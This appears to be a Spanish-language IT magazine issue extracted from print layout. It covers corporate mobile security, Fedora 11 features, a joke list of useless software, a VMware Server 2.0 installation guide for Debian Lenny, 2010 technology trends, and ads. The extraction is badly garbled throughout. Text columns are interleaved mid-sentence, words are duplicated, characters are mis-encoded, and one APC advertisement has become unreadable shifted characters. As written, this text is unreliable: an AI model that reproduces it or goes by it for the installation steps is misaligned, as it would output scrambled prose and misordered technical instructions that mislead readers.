/ NEX IT Especial Web /

59


Seguridad

La Importancia de la Seguridad en las Soluciones de Movilidad Corporativa

IDC da seguimiento el mercado de TI IT ya existente en su empresa. y telecomunicaciones en el mundo y IDC observa que en los últimos años percibe que la seguridad es uno de las áreas de tecnología de la informalos principales factores que las em- ción de las empresas en el mundo inpresas aprueban al momento de es- tervienen cada vez más en proyectos coger una solución de movilidad cor- de administración corporativa de IT, porativa. Verificar las certificaciones internacionales de seguridad es una etapa importante en la búsqueda de una mejor solución. Vale recordar que la seguridad debe estar presente en los smartphones, tanto en la transmisión de los datos como en las aplicaciones móviles, en los servidores de e-mail y en la integración con la estructura de

60 / NEX IT Especial Web /


Seguridad tanto para atender las propias exi- políticas de IT son aplicadas tanto a gencias como para mejorar la calidad los usuarios de computadoras como de los servicios disponibles para los a los usuarios de smartphones. usuarios. La movilidad corporativa también La facilidad en la administración de está presente en este contexto. Las los smartphones y las exigencias de las reglas de las empresas son factores a tener en consideración al momento de elegir una plataforma. Obtenga más información descargando el IDC White Paper gratuito de IDC.

Arbrex Comercial Group es una compañía con más de de 45 45 años años de de experiencia experiencia en en el el negocio negocio de de juguetes. juguetes.

Arbrex

Arbrex Comercial Group es una compañía con más

Arbrex Commercial Group S.R.L.

Cuenta con más de 20 fábricas argentinas y brasileras representadas, un equipo de profesionales altamente calificados y una estructura comercial activa en países de América, Europa y África.

Tel: 4855-4494 / NEX IT Especial Web /

61


Seguridad

62 / NEX IT Especial Web /


Seguridad

/ NEX IT Especial Web /

63


OPEN SOURCE

Fedora 11

La evolución de la computación de código abierto La distribución del código abierto demuestra el poder de la innovación inspirada en la comunidad, ofreciendo un conjunto de funciones más amplio hasta el día de hoy, una virtualización superior y un novedoso portal para la participación de la comunidad.

F

edora lanzó a la luz la última versión de su sistema operativo de código abierto. La onceava versión de

la comunidad incluye el conjunto más quinas virtuales y una mejor seguridad amplio de funcionalidades hasta el día mediante el soporte de SELinux para de hoy, destaca los avances realizados visitantes. También presenta mejoras en la administración de software y so- para escritorio tal como la descarga nido, mejora los principales compo- automática del administrador de fuennentes de virtualización y presenta el tes y contenidos mediante PackageKit, Fedora Community, un proyecto beta mejor soporte para el lector de huellas estilo portal.dale.

dactilares y un sistema de método de

El conjunto de funcionalidades de Fe- entrada para soportar usuarios con dora 11 incluye mejoras en virtualiza- idiomas internacionales ción, entre ellas una consola interactiva La labor fundamental para la función actualizada, un ayudante rediseñado de configuración de modo del kernel para la creación de visitantes de má- de Fedora 11 se completó como parte

64 / NEX IT Especial Web /


OPEN SOURCE de Fedora 10, que soportaba un peque- pantalla gráfica durante el proceso de ño subconjunto de tarjetas de video inicio. Esta versión además soporta basadas en ATI Radeon. Esta funcio- una selección más amplia de tarjetas nalidad está diseñada para acortar los ATI, así como muchas tarjetas Intel y tiempos de arranque y presentar una Nvidia. También incluye múltiples nueinterfaz más ordenada a los usuarios vas funcionalidades, tal como el sispermitiendo que el kernel realice el tema de archivos ext4 y el sistema de trabajo de desplegar inicialmente una compilaciones cruzadas MinGW.

Las siguientes son las características más importantes de Fedora 11: • Instalación automática de fuente y tipos mime: PackageKit fue introducido en Fedora 9 como una aplicación administradora de software multi distro. La capacidad que ofrece gracias a la integración con el escritorio se hizo más visible en Fedora 10, donde dio la instalación de codecs automática. Ahora en esta nueva versión, PackageKit extiende esta funcionalidad con la habilidad de instalar automáticamente fuentes donde se necesiten para ver y editar documentos. También incluye la capacidad de instalar manejadores para ciertos tipos de contenidos cuando se necesite.

por varios niveles de mezcladores en distintas aplicaciones para configurar las fuentes de sonido. Estos están todos expuestos en el control de volumen en el escritorio, haciendo que la experiencia del usuario sea confusa. PulseAudio nos permite unificar los controles de volumen en una interfase que hace la configuración de sonido más fácil y menos dolorosa.

• Huella digital: Mucho trabajo se realizó para poder usar lectores de huellas digitales como un mecanismo de autenticación. Actualmente, los lectores de huellas digitales son pro-

• Control de Volumen: Actualmen- blemáticas, e instalar/usar fprint y su te, la gente que usa Fedora debía ir módulo pam toma más tiempo de lo

/ NEX IT Especial Web /

65


OPEN SOURCE que realmente debería ser necesario. El objetivo de esta característica es hacer esto más fácil, proveyendo todas las piezas necesarias en Fedora, junto con la configuración bien integrada. Para habilitar esta funcionalidad, el usuario debe registrar sus huellas en el sistema como parte de la creación de su cuenta. Después de hacerlo, po- • Presto: Normalmente para actuadrán fácilmente ingresar y autenticar lizar un paquete en Fedora, se debe indistintamente pasando el dedo. Esto descargar un paquete de reemplazo simplifica enormemente un elemento entero. La mayor parte del tiempo de la administración de la identidad y (especialmente para paquetes más es un gran paso en la evolución del es- grandes), la mayoría de los datos accritorio Linux.

tuales en el paquete actualizado es el mismo que el del paquete original,

• Sistema de método de entrada pero todavía puede terminar descarIBus: ibus fue rescrito en C y es el gando el paquete completo. Presto nuevo método de entrada por defec- le permite descargar la diferencia to para idiomas de Asia. Permite que (llamada delta) entre el paquete que los métodos de entrada se agreguen tiene instalado y el que quiere actuay quiten dinámicamente durante una lizar. Esto puede reducir el tamaño sesión de escritorio. Soporta chino, in- de descarga de las actualizaciones en dio, japonés, coreano y más.

un 60 y un 80 por ciento. Sin embar-

¿Qué es Fedora? Fedora es un sistema operativo basado en Linux que trae lo último en software libre y de código abierto. Fedora es siempre libre para que cualquiera lo use, modifique o distribuya. Lo construyen personas de todo el planeta que trabajan juntos como una comunidad: el Proyecto Fedora. El Proyecto Fedora es abierto y todos son bienvenidos a unirse.

66 / NEX IT Especial Web /


OPEN SOURCE

/ NEX IT Especial Web /

67


OPEN SOURCE go, para usar esta característica debe tas USB, que los invitados automátiinstalar el complemento yum-presto camente detectarán y configurarán. con yum install yum-presto.

Junto con los resultados están un puntero del ratón que sigue al punte-

Las nuevas características

ro del cliente local uno a uno, y pro-

disponibles incluyen:

vee capacidades extendidas.

• Sistema de archivo Ext4: El sistema • MinGW (compilador cruzado de de archivo ext3 se mantuvo como un Windows): Fedora 11 provee MinGW, estándar maduro en Linux por un lar- un entorno de desarrollo para usuago tiempo. El sistema de archivo ext4 rios de Fedora que quieran compilar es una actualización principal que en forma cruzada sus programas para tiene un diseño mejorado, una mejor que se ejecuten en Windows sin teperformance y confiabilidad, soporte ner que usar Windows. En el pasado, para un almacenamiento más grande los desarrolladores tenían que portar y chequeos de sistema de archivo y y compilar todas las bibliotecas y heborrado de archivos mucho más rá- rramientas que necesitaban, y este pido. Ahora es el sistema de archivo enorme esfuerzo ocurría muchas vepredeterminado para instalaciones ces de manera independiente. Minnuevas.

GW elimina este trabajo duplicado a los desarrolladores de aplicaciones

• Consola Virt Mejorada: En Fedora proveyéndoles de un rango de biblio10 y anteriores, la consola de invitado tecas y de herramientas de desarrovirtual se limitaba a una resolución llo que ya fueron portados al entorno de 800x600. En Fedora 11, el objetivo del compilador cruzado. Los desaes tener una pantalla predeterminada rrolladores no tendrán que recompide 1024x768 mínima. Las instalacio- lar toda la pila de aplicaciones por si nes nuevas de F11 proveerán la habi- mismos, sino que solamente tendrán lidad de usar otros dispositivos en el que concentrarse en los cambios neinvitado virtual, tales como las table- cesarios por su aplicación 68 / NEX IT Especial Web /


OPEN SOURCE

http://www.centraltech.com.ar - Lavalle 348 - Piso 6 - Buenos Aires - Argentina

http://centraltech.com.ar/promo_empresas.php

http://www.centraltech.com.ar/promo_estudiantes.php

http://www.centraltech.com.ar/promo_distancia.php / NEX IT Especial Web / 69


General

Muchas aplicaciones y ninguna utilidad Con el nuevo concepto de Internet 2.0 surgieron miles de nuevas aplicaciones que facilitaron considerablemente muchos de los usos que le dábamos a Internet. Así encontramos por ejemplo programas que nos ayudan a aprovechar al máximo nuestra computadora o nuestros dispositivos en general. Y otros programas que no sirven prácticamente para nada. Acá les presentamos un listado de las peores.

Encabeza la lista el famo- simple repelente para mosquitos. so

software antimosquito

Este moderno “repelente” (que ya

El segundo lugar es para el

fue incluido hasta en los iPhones) al

Parrot Trainer, tal como in-

activarlo reproduce un sonido inau- dica su nombre es un programa que dible para los humanos que repele a sirve para entrenar a tu loro para que los mosquitos. Pero claro con esta ca- aprenda a repetir algunas palabras. racterística resulta imposible probar ¿Cómo? Simple. Primero hay que elesu eficacia. Más allá de que sea cier- gir un archivo de audio y luego confito o no, ¿no sería mucho más seguro gurar el intervalo para que el animal comprar uno de esos aparatos que se repita ese sonido. Probablemente, la enchufan a la pared que venden en repetición del sonido termine por alcualquier negocio? O mejor aún, un terar tu paz y agotar tu paciencia. 70 / NEX IT Especial Web /


General El tercer puesto lo ocupa un software que según parece fue pensado para médicos. Se trata

Simulador de Enfermedad de Retina, para que los médicos apren-

del

dan a diagnosticar este tipo de enfermedad. Ahora bien, se supone que luego de tantos años de estudio un profesional ya debería saber detectar esta enfermedad en el paciente. Además no resulta demasiado profesional usar un software encontrado en Internet para diagnosticar a su paciente. El cuarto lugar en el ranking de las aplicaciones más in- ponible hoy en día” y resalta el terror útiles lo ocupa Alien

Communicator de los mitómanos porque es capaz

1.0. Esta insólita aplicación, que solo de detectar la mentira en cualquier llegó a su primera versión, permite circunstancia, en cualquier lugar. comunicarse con extraterrestres, y Curiosamente muchos de estos prolo mejor de todo es que no requiere gramas nos hacen preguntarnos un conexión de Internet. Según su crea- solo interrogante: ¿por qué? ¿Por qué dor, esta aplicación es un “traductor” alguien querría ver cómo se escucha entre el extraterrestre más cercano y una imagen? Porque para eso sirve nuestro cerebro (sin comentarios). El quinto es el Detector

de

Mentiras, aparentemente

este programa. El sexto puesto se reserva para

UFO Watcher.

este programa utiliza la “tecnología Este increíble programa puede ir de más avanzada en análisis de voz dis- la mano con el Alien Comunicator, así / NEX IT Especial Web /

71


General una vez que nos entendimos con el dir la distancia recorrida por el Mouse. ser del espacio exterior, podemos con Quizás es una herramienta útil para los este software apuntar todos sus deta- retocadores, que quieren saber si su lles que te asombren de su peculiar mouse es veloz o no. Pero la realidad apariencia. Además, para los desme- es que nadie se va a poner a contar moriados, incluye un sitio para anotar los segundos ni a hacer cálculos, si el fecha, hora, lugar del avistaje, como si mouse es lento se reemplaza y listo. tuviésemos la posibilidad no sólo de encontrarnos con más de un extrate-

El noveno puesto es para el

rrestre sino también de olvidarlo!

Emulador de Cactus, un

Sus desarrolladores aparentemente elegante software que como su nomse vieron seriamente influenciados bre indica es capaz de simular las por Alf.

propiedades del cactus. Con Cactus Emulator se pueden activar las capaEl séptimo corresponde a cidades del cactus, observar imáge-

Picture and Sound, un nes, leer descripciones de todas sus software que es capaz de convertir propiedades, ejecutar presentaciones cualquier imagen en sonido. La pri- de diapositivas, seleccionar idiomas mer pregunta sería para qué sirve inglés, alemán o español, permitir o hacerlo si podemos tranquilamen- inhabilitar la opción de Autoejecute poner música de fondo. Además ción. Según el creador de esta sofispuede resultar bastante molesto que ticada aplicación, con este software cada vez que pasamos con el cursor uno se puede proteger de la radiapor encima de una imagen produzca ción electromagnética, estabilizar la un sonido.

sexualidad y regenerar el poder de la tierra para más energía.

Mousotron llega al octavo lugar. Este software nada

¿Quien no conoce las extra-

tiene que ver con los robots, es una

vagantes lámparas de lava?

aplicación que fue pensada para me- ¿Quién no quiso de chico tener una en 72 / NEX IT Especial Web /


General

su cuarto? Con

Lava Lamp I-mate indica su nombre es un entrenador

ya será posible tenerlas aunque sea para aprender a ser un hipnotizador en el escritorio de tu PC. Pero claro, al mejor estilo Tusam. Con este softtenerla virtualmente no es lo mismo ware habrá que tener cuidado de no quedar embobado frente al monitor.

que tener una real. Esta aplicación decorativa, al mejor estilo wallpaper, ocupa memoria en

En el doceavo lugar en-

la computadora y es el décimo pues-

contramos otra aplicación

to en el ranking.

decorativa, se trata de

Jeff´s Fish, una especie de wallpaper HypnoTrainer

llega al con pececitos interactivos que nadan

puesto once, y tal como por la pantalla de la PC simulando ser una pecera (¡de locos!)

/ NEX IT Especial Web /

73


General

Tu bĂşsqueda laboral ya tiene

% 0 1F0ECTIVIDAD

de E

Con solo 4 pasos

Ya sos parte de Certificados IT

Ingresa tu curcciculum vitae

04

03

02 01

Registrate en un instante Ingresa a nuestro sitio Web

En Certificados IT buscamos la mejor calidad

www.certificadosit.com 74 / NEX IT Especial Web /


General

una nueva forma de hacerse. podテゥs ser parte del mundo IT.

PEQUEテ前S PASOS PARA UN GRAN FUTURO

para que tu prテウximo proyecto laboral sea el mejor.

/ NEX IT Especial Web /

75


Virtualización

Emiliano Piscitelli Nantec Solutions

Pablo Sebastián De Vita Lemus

Instalando y configurando VMware Server 2.0 en Debian Lenny

E

l virtualizar un sistema servidores, la posibilidad de mostrar operativo trae aparejado distintos escenarios sin la necesidad innumerables beneficios, de tener que montar una infraestrucentre algunos de ellos po- tura para ello, etc.

demos destacar por ejemplo el poder realizar pruebas sobre ese sistema sin En nuestro caso vamos a instalar y comprometer ningún otro existente, configurar VMware Server 2.0 souna reducción notable en el consu- bre Debian GNU/Linux en su versión mo de energía y espacio físico de los STABLE “Lenny”.

76 / NEX IT Especial Web /


Virtualización

Descarga e Instalación Como primer paso debemos des- #aptitude install build-essential psmisc cargar el programa desde la página gcc-4.1 linux-headers-$(uname -r) oficial de VMware, para ello podemos colocar la siguiente dirección en Veamos para qué sirve cada una de nuestro navegador Web:

ellas:

https://www.vmware.com/freedownload/

El paquete “psmisc” nos va a insta-

login.php?product=server20

lar la aplicación “killall” entre otras, la misma es necesaria para el pro-

El programa se puede descargar y grama, el paquete build-essential utilizar gratuitamente previa registra- contiene todo lo necesario para la ción en el sitio.

compilación de las fuentes dentro de nuestra distribución Debian (gcc,

Una vez registrados nos enviarán un perl, etc), los headers son necesarios mail con la confirmación de la crea- para la posterior compilación de los ción de nuestra cuenta y de esta ma- módulos de VMware, el gcc-4.1 es nera vamos a tener la posibilidad de necesario para la compilación de los loguearnos en la página de VMware módulos de VMware ya que necesita para poder descargar el programa compilarse con el mismo Gcc que se servidor (disponible tanto en 32 como compiló el Kernel, en el caso de Lenen 64 bits) y los números de serie co- ny, si el mismo fue instalado desde rrespondientes (el archivo que des- cero, la versión de Gcc será la 4.1.3. cargaremos será el tar.gz).

Si se tiene un kernel compilado con otra versión de Gcc hay que tener en

Antes de proceder a desempaquetar cuenta de procurarse la versión de Gcc el archivo que descargamos, debe- acorde a la compilación del kernel. mos tener algunas herramientas ins- Una vez descargado el tar.gz lo cotaladas, para ello desde consola po- locamos dentro del directorio “/usr/ demos realizar lo siguiente:

src/” y ejecutamos lo siguiente:

/ NEX IT Especial Web /

77


Virtualización # tar xvzf paquete_vmware.tar.gz

Doc´s: /usr/share/doc/vmware

Donde paquete_vmware.tar.gz es En este caso lo que conviene (salvo el nombre del archivo que descarga- configuraciones especiales) es aceptar mos del sitio oficial de VMware.

por defecto todas las ubicaciones pro-

Luego de finalizada la descompre- puestas por el script del instalador. sión, procedemos a instalar el pro- Luego de la instalación se nos pregrama con la ejecución del siguiente guntará si queremos correr el script script:

de configuración “vmware-config.pl”. En nuestro caso le indicaremos que

# ./vmware-install.pl

sí y luego nos va a consultar si queremos o no aceptar la licencia, de esta

La instalación consta de dos etapas:

manera comenzará la etapa de confi-

1) La instalación del programa pro- guración. piamente dicha.

2) La etapa de la configuración.

Nota: En un momento de la configuración intentará compilar los distin-

La parte de la instalación es muy pa- tos módulos, en principio nos indirecida a lo que sería en Windows (si- cará que los módulos que tiene por guiente → siguiente → siguiente) al defecto no están preparados para la ejecutar el script, éste nos ira pregun- versión del kernel que tengamos en tando dónde va a colocar las distintas ese momento y se nos preguntará si partes del programa:

deseamos compilarlos.

Binarios: /usr/bin

Algo importante a resaltar es que

Directorio INIT: /etc

puede pasarnos que al intentar com-

Scripts INIT: /etc/init.d

pilar los módulos nos de un error del

Deamons: /usr/sbin

tipo “No es la misma versión del Gcc

Libraries: /usr/lib/vmware

instalado que la que se utilizó para la

Manuals: /usr/share/man

compilación del kernel”, en este caso

78 / NEX IT Especial Web /


Virtualización lo que debemos hacer es conseguir ders del kernel, en nuestro caso ya los la versión correspondiente del Gcc y hemos instalados con la herramienta luego realizar lo siguiente:

aptitude, anteriormente. Luego, el

# gcc=/usr/bin/versión_del_gcc

script de configuración compilará los módulos necesarios para VMware, al-

Donde “versión_del_gcc” es el bi- gunos de ellos son: nario de la versión del gcc con la que vmci ,vmnet ,vmsock y vmmon. se compiló el kernel que estamos uti- En otro punto se nos consultará si delizando actualmente.

seamos utilizar soporte de red para nuestro Vmware, de esta manera pro-

Otra forma de solucionar este pro- cederemos a configurar las distintas blema es creando un nuevo el enla- placas de red virtuales que necesitece simbólico del Gcc: (previo borrado mos. del anterior que se encuentra ubica- En un principio se crearán 3: do en /usr/bin)

- vmnet0: Placa de red en modo Bridge. - vmnet1: Placa de red en modo Hos-

# ln -s /usr/bin/version_del_ tOnly. gcc /usr/bin/gcc

- vmnet8: Placa de red en modo NAT.

De esta manera, se creará un enlace El modo Bridge nos da acceso directo simbólico al binario del Gcc que ne- a la red física donde este conectado cesitamos.

nuestro equipo, el modo HostOnly

Una vez concluido el paso anterior nos brinda acceso a una red virtual (en el caso de haber interrumpido la sin llegar a la red física y por último, configuración) la volveremos a eje- en el modo NAT nuestra PC física funcutar desde /usr/bin/vmwar-config.pl, ciona como gateway de las máquinas iniciándose nuevamente el proceso virtuales (hosts). de configuración. En el proceso de instalación nos pre- Nota: Si no creamos más placas de guntará dónde se encuentran los hea- red virtuales lo que tendremos que / NEX IT Especial Web /

79


Virtualización hacer en el caso de requerir placas Es conveniente ponerlas en una partiadicionales es correr nuevamente ción separada para mantener un orden el script de configuración “vmware- con el resto del sistema operativo. config.pl” para agregarlas.

Finalizando la instalación En el paso siguiente nos preguntará Por último, y ya llegando al final de cuáles son los puertos que vamos a la instalación, vamos a ingresar la liutilizar para comunicarnos con nues- cencia que se nos otorgó en el sitio tro servidor VMware.

de Vmware al momento de nuestra

Los puertos por defecto son los si- registración y descarga del programa guientes:

(si en este momento no contamos con

*Puerto para conexiones remotas: la licencia, no hay problema alguno, 902.

ya que la podemos ingresar luego).

*Puerto para conexiones HTTP: 8222. *Puerto para conexiones HTTPS: Por último, se instalarán los VMware 8333.

VIX API y se empezará a levantar los distintos servicios que componen el

Luego debemos ingresar el nombre VMware Server, de esta manera ya del usuario que va a ser el adminis- estamos habilitados para conectartrador de VMware Server, este usua- nos a nuestro servidor. rio tendrá control sobre todo lo del servidor (el usuario debe existir en Administrando VMware nuestro servidor GNU/Linux). Más Lo único que necesitaremos para poadelante veremos también cómo der manejar nuestro servidor VMware agregar otros usuarios y roles para 2.0 es algún navegador Web, en el manejar el servidor.

mismo colocamos la dirección IP de nuestro servidor, como por ejemplo:

Otro de los puntos que debemos es- http://x.x.x.x:8222/ o pecificar será la ruta en que guarda- https://x.x.x.x:8333/ rán las distintas máquinas virtuales.

80 / NEX IT Especial Web /


Virtualizaci贸n

/ NEX IT Especial Web /

81


Virtualización De esta manera obtendremos una vez realizado se desplegará el panel pantalla de login como se muestra en de control donde tendremos la posila figura 1.

bilidad de poder configurar en detalle

Figura 1 - Log In

Aquí introduciremos el nombre de nuestro VMware (ver figura 2). usuario y contraseña que anterior- Agregando roles mente indicamos para que actúe Una buena forma de mantener un orcomo administrador del Server. Una den en los permisos que se les asig-

Figura 2

82 / NEX IT Especial Web /


Virtualización nan a los distintos usuarios que van a servidor, el rol “Read-Only” nos peradministrar las máquinas virtuales o mite ver pero no permite modificar el servidor mismo, es con una buena configuración alguna dentro del serdistribución de roles, lo cual permiti- vidor y por último el rol “No Access” rá administrar distintos aspectos de no permite loguear a nadie que tenga ese rol.

nuestro servidor.

Para poder acceder a la administra- Si hacemos click sobre el botón “Add” ción de roles debemos ir al menú vamos a poder crear nuevos tipos de

Figura 3

“Administration” y luego a “Manage roles, para ello se nos presentará una Roles”. Se nos va a desplegar una ven- pantalla como la que se muestra en tana como la que se ve en la figura 3.

la figura 4.

Como podemos observar nos vamos Aquí podremos tildar los permisos a encontrar con tres roles por defecto: que tendrá nuestro nuevo grupo y Administrator, Read-Only y No Access.

a partir de allí vamos a poder usar

El rol “Administrator” tiene control nuestro nuevo rol en la selección de total sobre los permisos dentro del usuarios.

/ NEX IT Especial Web /

83


Virtualización

Figura 4

Agregando usuarios

a poder buscar el usuario que quera-

Para poder agregar más usuarios mos y que esté dado de alta en nuesque puedan administrar el servidor tro servidor Debían, luego podremos VMware, tendremos que ir a la so- darle los roles necesarios. lapa “permissions”, aquí se nos pre- En el link “New Permission” vamos sentará las distintas opciones, como a poder buscar el usuario que querapodemos ver en la figura 5.

mos y que esté dado de alta en nues-

En el link “New Permission” vamos tro servidor Debían, luego podremos 84 / NEX IT Especial Web /


Virtualizaci贸n

/ NEX IT Especial Web /

85


Virtualizaci贸n

Figura 5

darle los roles necesarios. Una vez seleccionado el usuario que queremos agregar para ingresar a nuestro servidor Vmware, le podemos otorgar el rol que queramos (previamente

Figura 6

86 / NEX IT Especial Web /


Virtualizaci贸n configurado), como se ve en la figura 7. Tambi茅n podemos agregar usuarios editando directamente el archivo de usuarios que se encuentra en /etc/vmware/hostd/authorization.xml. En el

Figura 7

caso que decidamos hacerlo, lo pri- # /etc/init.d/vmware-mgmt stop mero que debemos hacer, es bajar el Luego editamos el archivo, el cual servicio:

contiene la siguiente estructura:

/ NEX IT Especial Web /

87


Virtualización Los códigos de los Roles por defecto <ConfigRoot>

son los siguientes:

Administrador: -1

<ACEData id=”10”>

<ACEDataEntity>ha-fol-

der-root</ACEDataEntity>

Solo lectura: -2 Acceso denegado: -5

<ACEDataId>10</

ACEDataId>

La línea “ACEDataIsGroup” nos indica

<ACEDataIsGroup>false</ADECataIs- si ese usuario es un grupo o no y por Group>

último, la línea “NextAceId” nos da el

ID siguiente para el nuevo usuario.

<ACEDataPropagate>true</ACEDataLuego de realizar las correspondien-

Propagate>

<ACEDataRoleId>-1</

ACEDataRoleId>

tes modificaciones volvemos a iniciar el servicio de la siguiente manera:

<ACEDataUser>usuario</

ACEDataUser>

</ACEData>

<NextAceId>11</NextAceId>

</ConfigRoot>

#/etc/init.d/vmware-mgmt start Y listo, ya con esto tendremos nuestros usuarios cargado en nuestro VMware.

La línea “ACEDataUser” es donde vamos a agregar el nombre del usua- Configurando Start up/Shutdown rio Linux que queramos. La línea Settings “ACEDaraRoleId” es la que nos dice Algo muy útil es el poder configurar qué permisos queremos que tenga cómo van a iniciar o apagarse las el usuario que estamos agregando, máquinas virtuales en el inicio de donde podremos otorgarle permisos nuestro servidor Debian, para poder de solo lectura, de acceso denegado configurar esto debemos hacer click o de administrador (como hemos vis- en el link llamado “Edit Virtual Mato anteriormente).

88 / NEX IT Especial Web /

chine Startup/Shutdown Settings” y


Virtualizaci贸n

http://www.centraltech.com.ar - Lavalle 348 - Piso 6 - Buenos Aires - Argentina

http://centraltech.com.ar/promo_empresas.php

http://www.centraltech.com.ar/promo_estudiantes.php

http://www.centraltech.com.ar/promo_distancia.php / NEX IT Especial Web / 89


Virtualización de esta manera se nos va a presentar las máquinas virtuales van a iniciar en una ventana como se muestra en la el orden que nosotros queramos. figura 8. Nuestra máquina virtual va a apare- Podemos configurar también el tiemcer en la lista “Manual Startup”. Con po (especificado en segundos) entre los botones “Move up, Move Down” que inicia una máquina virtual y otra. podemos mover nuestra máquina Para ello debemos modificar los vavirtual seleccionada hacia las listas lores en “Default Startup Delay”. Adellamadas “Any Order” y “Specified Or- más se puede configurar también der”. En la lista “Any Order” las máqui- el tiempo entre el apagado de cada nas virtuales van a iniciar sin ningún máquina virtual, de la misma manera orden específico. En “Specified Order” que el anterior.

Figura 8

90 / NEX IT Especial Web /


Virtualización Datastore Un DataStore es donde van estar alo- una partición dentro de nuestro serjadas las máquinas virtuales que va- vidor VMware, o quizás en un direcyamos generando. En principio esta torio compartido. Para poder utilizarruta se la hemos indicado cuando co- lo, el directorio compartido tiene que rrimos el script de configuración.

estar previamente montado en nues-

El Datastore puede estar ubicado en tro servidor. Para agregar un nuevo diferentes lugares, como por ejemplo: Datastore se debe hacer click en “Add nuestro mismo disco, algún otro, en Datastore” en la pantalla principal de

Figura 9

/ NEX IT Especial Web /

91


Virtualización nuestra consola de administración.

boton play y ya podemos empezar a utilizarla.

En la figura 9 vemos el formulario para agregar un nuevo datastore.

Lo primero que debemos hacer (una vez iniciada la máquina virtual) es ir

Creando e Iniciando una máquina

a la solapa “Console”, allí le damos

virtual

doble click al logo que aparece. Si

Crear una nueva máquina virtual es es la primera vez que hacemos esto algo sencillo, solo debemos hacer VMware nos va a solicitar la instalaclick en “Add new virtual machine” y ción de un add-on para nuestro naveseguir una serie de pasos sencillos, gador, el mismo nos va a permitir tecomo por ejemplo:

ner una ventana para manejar nuestra

•Asignar nombre y ubicación de nues- máquina virtual. La ventana es muy tra máquina virtual (datastore).

parecida a la ventana del VMware

•Seleccionar qué sistema operativo player. Una muestra de la misma la vamos a correr.

podemos ver en la figura 10.

•Asignar el tamaño de la memoria RAM y cuántos procesadores vamos Desde aquí vamos a poder manejar a utilizar.

nuestra máquina virtual y realizar to-

•Elegir si crearemos un nuevo disco das las tareas que necesitemos con rígido o agregaremos uno ya existente. la misma. •Configurar la placa de red de nuestra En conclusión máquina virtual.

Vmware nos ofrece diferentes versio-

•Y por último, si utilizaremos CD-ROM nes para poder virtualizar, entre ellas (físico o imagen), disquetera (física o podemos destacar las versiones Worimagen) y los puertos USB.

kstation, Player, ESX y Server. Si bien de todas estas la única que podemos

De esta manera nuestra máquina vir- usar sin pagar licencia alguna es la tual estará lista para empezar a traba- versión Server, no tiene mucho que jar. Solo nos restará hacer click en el envidiarle al resto, y menos aun en 92 / NEX IT Especial Web /


Virtualización

Figura 10

su versión actual (2.0).

en contra parte a su versión anterior

Como ya pudimos observar a lo lar- (1.0.x), pero hoy en día cualquier equigo de este artículo, VMware Server po moderno puede soportar tranqui2.0 nos permite virtualizar distintos lamente esta carga, es por todo ello sistemas operativos en uno solo ser- que creo que Vmware Server es un vidor, además nos da la posibilidad producto realmente recomendable de poder tener permisos especiales para la virtualización en entornos para distintos usuarios con distintos SOHO, aprovechando de esta maneprivilegios, siendo todo esto es muy ra, todas las ventajas que nos otorga. útil para su administración, como así Links de interes también la ventaja de no necesitar un cliente para poder acceder a los paneles de control del servidor, lo cual lo hace realmente interesante. Quizás como punto en contra podría nombrar el alto consumo de recursos

VMware documentation: http://www.VMware.com/support/pubs/server_ pubs.html VMware server user´s guide (pdf): http://www.VMware.com/pdf/vmserver2.pdf Virtuatopia: http://www.virtuatopia.com/index.php/Main_Page Virtualization Admin: http://www.virtualizationadmin.com/

/ NEX IT Especial Web /

93


General

Las 6 tendencias

del 2010 Si en épocas de calma resulta difícil predecir el futuro, en un contexto tan incierto como el actual resulta casi imposible. No obstante, al seguir de cerca el mercado tecnológico se puede tener una idea de las tendencias que se afianzaron en la primera etapa de 2009 para saber cuáles se profundizarán de cara al 2010.

S

martphones no tan exclusivos como antes, consolas de video ultra sofisticadas, re-

des sociales como el servicio estrella, herramientas Open Source para revertir el efecto de la crisis, concientización de los recursos con tecnología Green IT, concepto de outsourcing para las empresas extranjeras, son algunas de las tendencias que se vislumbran en el sector IT para el próximo año. Veamos cuáles son y porqué.

94 / NEX IT Especial Web /


General

Monitorear todos sus activos informรกticos nunca serรก fรกcil... ...pero ahora es mucho mรกs sencillo. Con InfraStruXureยฎ Central de APC, nuestro paquete de software para administraciรณn de centros de datos ahora es completamente estรกndar. 6X HPSUHVD HVWยผ FUHFLHQGR Gร D D Gร D HVSHFLDOPHQWH SRU OD SUROLIHUDFLร Q GH DSOLFDFLRQHV GH DOWD GHQVLGDG 3HUR FXDQGR VH FRQVROLGDQ VHUYLGRUHV SDUD DKRUUDU HVSDFLR \ HQHUJร D DXPHQWDQ ORV ULHVJRV 8Q PRYLPLHQWR HQ IDOVR \ OD UHG GHMD GH IXQFLRQDU $3& FRPSUHQGH TXH OD DGPLQLVWUDFLร Q GH VXV DFWLYRV HV HVHQFLDO SDUD HO EXHQ UHQGLPLHQWR GH VX HVWDEOHFLPLHQWR 7DPELร Q VRPRV FRQVFLHQWHV GH TXH HO VRIWZDUH GH DGPLQLVWUDFLร Q GHSHQGH GH OD FDQWLGDG GH GLVSRVLWLYRV TXH PRQLWRUHD &RQWURODU YDULDV SDQWDOODV \ UHDOL]DU XQD Vร QWHVLV GH ORV GDWRV D OD YHORFLGDG TXH UHTXLHUHQ VXV QHJRFLRV HV XQD WDUHD GLIร FLO SHUR QHFHVDULD 3RU HVR SUHVHQWDPRV HO ร QLFR SDTXHWH GH VRIWZDUH GH DGPLQLVWUDFLร Q YHUGDGHUDPHQWH HVWยผQGDU GHO PHUFDGR TXH UHร QH WRGRV VXV GDWRV HQ XQ VROR OXJDU ,QIUD6WUX;XUH &HQWUDO H ,QIUD6WUX;XUH &KDQJH \ &DSDFLW\ 0DQDJHU Y

Conozca sus equipos informรกticos y vea mรกs allรก.

La unidad InfraStruXure Central de APC estรก disponible en tres tamaรฑos diferentes para adaptarse a sus necesidades especรญficas.

Toda la tecnologรญa a la vista... Implemente InfraStruXure Central con Change Manager \ &DSDFLW\ 0DQDJHU SDUD ORJUDU XQD SODQLร FDFLร Q SUHGLFWLYD \ XQD YLVLELOLGDG FRPSOHWD GH VXV DFWLYRV LQIRUPยผWLFRV

Con sรณlo un vistazo sepa dรณnde poner su prรณximo servidor y dรณnde no

Conozca cuรกnta energรญa estรก ingresando a su centro de datos

